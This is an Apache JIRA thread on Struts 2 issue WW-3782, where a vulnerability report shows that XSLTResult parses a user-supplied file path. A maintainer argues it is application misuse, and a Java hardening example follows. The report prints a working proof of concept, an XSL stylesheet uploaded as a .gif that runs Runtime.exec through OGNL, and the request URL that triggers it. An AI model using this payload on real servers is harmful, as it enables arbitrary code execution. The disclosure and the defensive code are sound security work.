[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235436#comment-13235436 ]

Lukasz Lenart commented on WW-3782:
-----------------------------------

You mean that your application is taking a user file and uses it as an input 
for XSLT Result? Without checking the content of the file? XSLT Result was 
designed to be based on server-side files and not to use any file uploaded by 
an accidental user.

It's exactly the same case as when you aren't escaping input form parameters and 
use them directly in your SQL queries - it's called SQL injection.
                
> Struts2 framework XSLTResult local file code execution vulnerability
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> Struts2 allows an action to have several result types, including the XSLT type. This type accepts a file path submitted by the user and parses it as an XSLT file, regardless of the file extension.
> This is the XSLTResult source code:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> // get the value of "xslt.location" submitted by the user
> String pathFromRequest = 
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> // parse the user-submitted file path as XSLT
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> Because of this code, as long as any action in the project uses xsltResult, an attacker can make the application parse a file uploaded by the attacker as XSLT.
> An example action that uses xsltResult:
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT parsing allows Java static methods to be executed, so the attacker only needs to upload a file to the server,
> for example:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
>                version="1.0" xmlns:ognl="ognl.Ognl">
>       <xsl:template match="/">
>               <html> 
>                       <body> 
>                          <h2>hacked by kxlzx</h2> 
>                          <h2>http://www.inbreak.net</h2> 
>                          <exp>
>                                        <xsl:value-of 
> select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
>                               </exp>
>                       </body> 
>               </html> 
>       </xsl:template> 
> </xsl:stylesheet>
> When this xsl file is parsed, it calls the following in OGNL:
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> leading to arbitrary code execution.
> Suppose the URL of an action that returns xslt is
>  
> http://www.inbreak.net/xslt.action
>  
> then the attacker can submit
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> and the result becomes
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: 
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
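As an added example (not code from the Struts project, the reporter or the commenter), this is the defensive shape Lukasz's reply points at: the request may only select a stylesheet from a server-side allowlist, never supply a path, and the TransformerFactory runs with JAXP secure processing so that extension-function calls like the ognl: call in the report are refused even if a hostile stylesheet were ever loaded. The class name, the allowlist paths and the harmless math: stylesheet used to probe the factory are constructed for illustration; it assumes Java 9+ (for Map.of) and the JDK's built-in XSLTC.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.transform.Templates;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

/**
 * Hardened stylesheet handling for an XSLT result (added example, not Struts code).
 * Control 1: the request never supplies a path; it may only name a key in a
 *            server-side allowlist, and anything else is rejected.
 * Control 2: the TransformerFactory runs with secure processing enabled, so the
 *            JDK/XSLTC implementation refuses extension-function calls such as
 *            ognl:getValue(...) even if a hostile stylesheet were ever compiled.
 */
public final class SafeXsltResult {

    // Server-controlled allowlist (constructed sample paths): request key -> stylesheet.
    private static final Map<String, String> STYLESHEETS = Map.of(
            "report",  "/WEB-INF/xslt/report.xsl",
            "summary", "/WEB-INF/xslt/summary.xsl");

    private final TransformerFactory factory;

    public SafeXsltResult() throws TransformerConfigurationException {
        factory = TransformerFactory.newInstance();
        // Disables extension functions (and other unsafe features) in the JDK's XSLTC.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try {
            // Also refuse xsl:import/xsl:include from external locations; not every
            // TransformerFactory implementation knows this attribute.
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        } catch (IllegalArgumentException unsupported) {
            // Implementation without the attribute: FEATURE_SECURE_PROCESSING still applies.
        }
    }

    /** The only thing the request may choose is an allowlist key, never a path. */
    static String resolveLocation(String requestedKey) {
        String key = (requestedKey == null) ? "report" : requestedKey;
        String location = STYLESHEETS.get(key);
        if (location == null) {
            // A request value like "upload/7758521.gif" or "../WEB-INF/web.xml" ends up here.
            throw new IllegalArgumentException("unknown stylesheet key: " + requestedKey);
        }
        return location;
    }

    /** Compiles a stylesheet under secure processing; extension calls fail here or at transform time. */
    Templates compile(String stylesheet) throws TransformerConfigurationException {
        return factory.newTemplates(new StreamSource(new StringReader(stylesheet)));
    }

    String transform(Templates templates, String xml) throws TransformerException {
        Transformer t = templates.newTransformer();
        StringWriter out = new StringWriter();
        t.transform(new StreamSource(new StringReader(xml)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        SafeXsltResult result = new SafeXsltResult();

        // Control 1: the uploaded-file path from the report is not an allowlist key.
        try {
            resolveLocation("upload/7758521.gif");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        System.out.println("report -> " + resolveLocation("report"));

        // Control 2: a constructed stylesheet calling a harmless Java static method through
        // the same class-namespace extension mechanism the report's payload relies on.
        String extensionStylesheet =
                "<xsl:stylesheet xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
              + " version=\"1.0\" xmlns:math=\"java.lang.Math\">"
              + "<xsl:template match=\"/\"><out><xsl:value-of select=\"math:abs(-1)\"/></out></xsl:template>"
              + "</xsl:stylesheet>";
        try {
            Templates tpl = result.compile(extensionStylesheet);
            System.out.println(result.transform(tpl, "<doc/>"));
            System.out.println("WARNING: extension function ran; secure processing is not enforced");
        } catch (TransformerException e) {
            System.out.println("extension call refused: " + e.getMessage());
        }
    }
}
```

The probe in main is the check worth keeping in a deployment's test suite: if the "WARNING" branch ever prints, the container has swapped in a TransformerFactory that does not honour FEATURE_SECURE_PROCESSING, and the allowlist becomes the only control standing.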

